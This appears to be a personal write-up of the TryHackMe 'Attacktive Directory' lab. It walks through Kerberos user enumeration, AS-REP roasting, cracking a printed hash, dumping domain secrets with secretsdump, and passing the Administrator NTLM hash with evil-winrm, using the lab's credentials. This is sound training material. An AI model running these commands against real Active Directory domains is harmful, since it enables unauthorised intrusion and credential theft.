Practice
  • 🛤️TryHackMe Rooms
    • HackersVsHackers
    • Vulnnet - The End Game
    • Surfer
    • Corridor
    • Mustacchio
    • Wordpress: CVE-2021-29447
    • Bounty Hacker
    • Simple CTF
    • Agent Sudo
    • Lazy Admin
    • Ignite
    • Brooklynn 99
    • c4ptur3th3fl4g
    • Lian_Yu
    • Rabbit
    • Gallery
    • Overpass
    • Team
    • Easy Peasy
    • CmesS
    • Ultratech
    • Wonderland
    • Anonymous
    • GamingServer
    • Tomghost
    • ConvertMyVideo
    • DogCat
    • Blog
    • Git Happens
    • 0day
    • Road
    • Inferno
    • Opacity
    • Market Place
    • Valley CTF
    • Weasel
    • SafeZone
    • Blueprint
    • Fusion Corp
    • Quotient
    • Unbaked Pie
    • Kenobi
    • Steel Mountain
    • Alfred
    • Hack Park
    • Game Zone
    • Daily Bugle
    • Retro
    • Corp
    • Attacktive Directory
    • Vulnnet - Roasted
    • Vulnnet - Active
    • Vulnnet - Internal
    • Enterprise - Hard
    • Iron Corp - Hard
    • Ra - Hard
    • For Business Reasons
  • 📦HackTheBox
    • Linux Boxes
      • Lame
      • Shocker
      • Nibbles
      • Beep
      • Cronos
      • Nineveh
      • Sense
      • Solidstate
      • Node
      • Valentine
      • Poison
      • Sunday
      • Irked
      • FriendZone
      • Networked
      • Jarvis
      • Tabby
      • Mirai
      • Popcorn
    • Windows Boxes
      • Active
      • Forest
      • ChatterBox
      • Resolute
      • Intelligence
  • 🤖CTF's
    • CloudSEK CTFs
    • ACM Cyber - UCLA
  • ¯\_(ツ)_/¯
    • Interview Topics
  • 🪣BOF - OSCP
    • Basics
    • Spiking
    • FUZZing
    • Finding the Offset
    • Overwriting the EIP
    • Finding BAD Characters
    • Finding RIGHT Module
    • Generating Shellcode
  • 📛Active Directory
    • Basics
      • Managing AD Users
      • Managing AD Computers
      • Group Policies
      • Authentication Methods
      • Trees, Forests and Trusts
    • Enumeration Techniques
    • Initial Attack Vectors
    • Post Compromise Enumeration
    • Post Compromise Attacks
      • Token Impersonation - LM
      • Kerberoasting
      • cPassword / GPP Attack
      • URL File Attacks
      • PrintNightmare
      • Golden Ticket Attacks
      • ZeroLogon Attacks
    • Lateral Movement and Pivoting
      • File Transfers
      • Spawning Processes Remotely
      • Moving Laterally with WMI
      • Alternate Authentication Material
      • Abusing User's Behaviour
      • Port Forwarding
      • Maintaing Access
      • Pivoting
      • Cleaning Up
    • Other Resources
  • 🛡️Powershell Basics
    • Getting Started
      • Functions
  • 😁Others
    • API Security
    • Cloud Security
  • Enumeration
    • Local PrivEsc
    • Remoting
    • Persistence
    • Kerberos
Powered by GitBook
On this page
  • Enumeration
  • Initial Compromise
  • Privilege Escalation
  1. TryHackMe Rooms

Attacktive Directory

AS-REP Roasting - SMB Enumeration - Dumping Secrets

PreviousCorpNextVulnnet - Roasted

Last updated 1 year ago

Enumeration

Starting off with the scan

The Top Level Domain Name is spookysec.local and we see a bunch of services - DNS, IIS, Kerberos, RPC, netbios etc

Let's start enumerating port 139 & 445 :)

Found Domain Name - THM-AD

Tried accessing some shares via anonymous login - Failed, This challenge provides us with a set of username and passwords so let's utilize that for our further move :)

We will be bruteforcing the DC using kerbrute to find valid users

$ kerbrute userenum --dc <IP> -d spookysec.local userlist.txt

Initial Compromise

We can attempt to abuse a feature within Kerberos with an attack method called ASREPRoasting

ASReproasting occurs when a user account has the privilege “Does not require Pre-Authentication” set - This means that the account does not need to provide valid identification before requesting a Kerberos Ticket on the specified user account

$ impacket-GetNPUsers spooky.local/ -no-pass -usersfile users.txt -dc-ip <target ip>

This returns that the user svc-admin can query a ticket with no password

$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:408ee4a3e91ec877b931d35c56364c77$63dc9e093d6f3ddfd0074033786ed4d4d6e5f3e9f27be7f98866c0c91c4271c6c8a721eafa9e343a2b9638da64fe71d7563c31e51e6aac0686ba9025ab8ff2d41b8b24f38888cd803c70568744a12daa95cca16b73fa6bc5b20f1fb697b29fd1fe39fa0553ae07ad7e6e2f5232e306ee2abf3ee2ba8ebc704bc96f0d60cd245f96f4caa7c20c3a673fba2b25a384593b01e334560348a146d9168e1fc594b8c59e11382193bd2b3f1c421f9d5fdc61167c8f3bfa18d60fc6fca79923c16b707927719330363b593c28ccc0c7dd2c5e7696b43d45a4bc016341f773805c53f51d2b6ae4a0fa3c3280a18a9d53d9b5fd08337c

We can now crack this hash using john or hashcat (18200)

svc-admin:management2005

We can now continue our enumeration, listing shares etc

This file had a base64 encrypted string, and boom its a username and password !

backup@spookysec.local:backup2517860

Privilege Escalation

Wai whattttt, don't tell me this is the DC's backup account :) - Let's try dumping some secrets with this creds and check tho

impacket-secretsdump -just-dc backup@10.10.115.36

We dumped the Administrator's NTLM hash, we can now pass this hash and gain admin privileges !

evil-winrm -i <target ip> -u Administrator -H 0e0363213e37b94221497260b0bcb4fc
🛤️
THE END :)